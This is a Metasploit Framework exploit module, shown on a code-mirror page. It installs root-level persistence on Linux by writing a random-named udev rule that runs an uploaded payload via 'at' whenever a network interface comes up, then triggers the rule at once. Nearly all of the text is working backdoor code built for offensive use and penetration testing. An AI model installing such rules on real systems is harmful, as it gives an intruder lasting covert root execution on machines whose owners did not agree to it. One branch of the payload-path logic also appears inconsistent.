Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/udev.rb
31151 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7


8
  Rank = GreatRanking

9


10
  include Msf::Post::File

11
  include Msf::Post::Unix

12
  include Msf::Exploit::Local::Persistence

13
  prepend Msf::Exploit::Remote::AutoCheck

14
  include Msf::Exploit::Deprecated

15
  moved_from 'exploits/linux/local/udev_persistence'

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'udev Persistence',

22
        'Description' => %q{

23
          This module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk.

24
          It'll be executed with root privileges everytime a network interface other than l0 comes up.

25
          Execution is triggered through at command, so it must be installed on the target.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Julien Voisin'

30
        ],

31
        'Platform' => [ 'unix', 'linux' ],

32
        'Arch' => [

33
          ARCH_CMD,

34
          ARCH_X86,

35
          ARCH_X64,

36
          ARCH_ARMLE,

37
          ARCH_AARCH64,

38
          ARCH_PPC,

39
          ARCH_MIPSLE,

40
          ARCH_MIPSBE

41
        ],

42
        'Payload' => {

43
          'BadChars' => '\n"'

44
        },

45
        'SessionTypes' => [ 'shell', 'meterpreter' ],

46
        'Targets' => [ ['Automatic', {}] ],

47
        'DefaultTarget' => 0,

48
        'Privileged' => true,

49
        'DisclosureDate' => '2003-11-01', # udev release date

50
        'Notes' => {

51
          'Stability' => [CRASH_SAFE],

52
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

53
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

54
        },

55
        'References' => [

56
          ['URL', 'https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp'],

57
          ['URL', 'https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/'],

58
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

59
          ['ATT&CK', Mitre::Attack::Technique::T1546_017_UDEV_RULES]

60
        ]

61
      )

62
    )

63
    register_options([

64
      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

65
      OptString.new('UDEV_PATH', [false, 'Path to udev', '/lib/udev/rules.d/']),

66
      OptString.new('UDEV_RULE', [false, 'Rule name for udev. Defaults to random']),

67
    ])

68
  end

69


70
  def check

71
    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')

72
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

73
    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)

74
    return CheckCode::Safe("#{datastore['UDEV_PATH']} doesnt exist") unless exists?(datastore['UDEV_PATH'])

75
    return CheckCode::Safe("#{datastore['UDEV_PATH']} isnt writable") unless writable?(datastore['UDEV_PATH'])

76


77
    return CheckCode::Safe('at commmand not found') if get_at_command('').nil?

78


79
    CheckCode::Appears('likely exploitable')

80
  end

81


82
  def get_at_command(payload_path)

83
    return nil unless executable? '/usr/bin/at'

84


85
    %(/usr/bin/at -M -f #{payload_path} now)

86
  end

87


88
  def install_persistence

89
    udev_rule = datastore['UDEV_RULE'].blank? ? %(#{Rex::Text.rand_text_numeric(2)}-#{Rex::Text.rand_text_alphanumeric(8)}.rules) : datastore['UDEV_RULE']

90
    backdoor_path = "#{datastore['UDEV_PATH']}/#{udev_rule}"

91
    payload_path = "#{writable_dir}/#{(datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alphanumeric(5..10))}"

92


93
    if exists? backdoor_path

94
      fail_with Failure::BadConfig, "#{backdoor_path} is already present"

95
    end

96


97
    if payload.arch.first == 'cmd'

98
      upload_and_chmodx(payload_path, "#!/bin/sh\n#{payload.encoded}")

99
    else

100
      payload_path = writable_dir

101
      payload_path = payload_path.end_with?('/') ? backdoor_path : "#{backdoor_path}/"

102
      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

103
      payload_path << payload_name

104
      print_status("Uploading payload file to #{payload_path}")

105
      upload_and_chmodx payload_path, generate_payload_exe

106
    end

107
    @clean_up_rc << "rm #{payload_path}\n"

108


109
    print_good "#{payload_path} written"

110


111
    fail_with(Failure::PayloadFailed, 'Failed to write UDEV file') unless write_file(backdoor_path, %(SUBSYSTEM=="net", KERNEL!="lo", RUN+="#{get_at_command(payload_path)}"))

112
    @clean_up_rc << "rm #{backdoor_path}\n"

113


114
    print_good "#{backdoor_path} written"

115


116
    # need to trigger first rule manually

117
    print_status 'Triggering udev rule'

118
    cmd_exec('udevadm trigger -v --subsystem-match=net')

119
  end

120
end

121


122